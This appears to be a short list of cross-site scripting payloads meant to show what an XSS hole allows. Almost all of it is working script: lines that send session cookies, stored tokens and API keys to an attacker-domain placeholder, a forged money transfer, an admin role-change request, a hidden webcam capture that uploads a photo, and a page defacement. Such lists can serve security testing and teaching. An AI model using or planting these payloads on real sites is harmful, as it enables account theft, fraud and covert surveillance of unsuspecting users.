- Cookie stealing
<script> fetch(`https://[ATTACKER-DOMAIN]/?cookie=${document.cookie}`) </script>
- token stealing
<script> fetch(`https://[ATTACKER-DOMAIN]/?token=${localStorage.getItem("token")}`) </script>
- API key stealing
<script> fetch('/myinfo') .then(response => response.json()) .then(data => { return fetch(`https://[ATTACKER-DOMAIN]/?api_key=${data.api_key}`) }) </script>
It can create a greater risk when combined with vulnerabilities like CSRF. (The impact may vary depending on the purpose or function of the service.)
-
Making a transfer
<script> initiateTransaction("attacker_account",1000) </script>
-
Privilege escalation
<script> fetch('https://[ATTACKER-DOMAIN]/change-role', { method: 'POST', body: "user_id=1234&role=admin" }) </script>
Web browser-provided APIs can be exploited to access OS features. (e.g., Media Stream API, Clipboard API, etc.).
- Camera access
<script> document.addEventListener('DOMContentLoaded', async () => { const v = document.createElement('video'); v.autoplay = true; v.style.display = 'none'; document.body.appendChild(v); const c = document.createElement('canvas'); c.style.display = 'none'; document.body.appendChild(c); const s = await navigator.mediaDevices.getUserMedia({ video: true }); v.srcObject = s; setTimeout(() => { const ctx = c.getContext('2d'); c.width = v.videoWidth; c.height = v.videoHeight; ctx.drawImage(v, 0, 0); c.toBlob(b => { const f = new FormData(); f.append('image', b, 'photo.png'); fetch('http://[]/', { method: 'POST', body: f }); }, 'image/png'); }, 1000); }); </script>
-
Defacement
<script> document.body.innerHTML = ` <div style="position:fixed; top:0; left:0; width:100%; height:100%; background-color:black; display:flex; align-items:center; justify-content:center; color:red; font-size:3em; font-family:sans-serif; z-index:10000;"> You've been hacked </div> `; </script>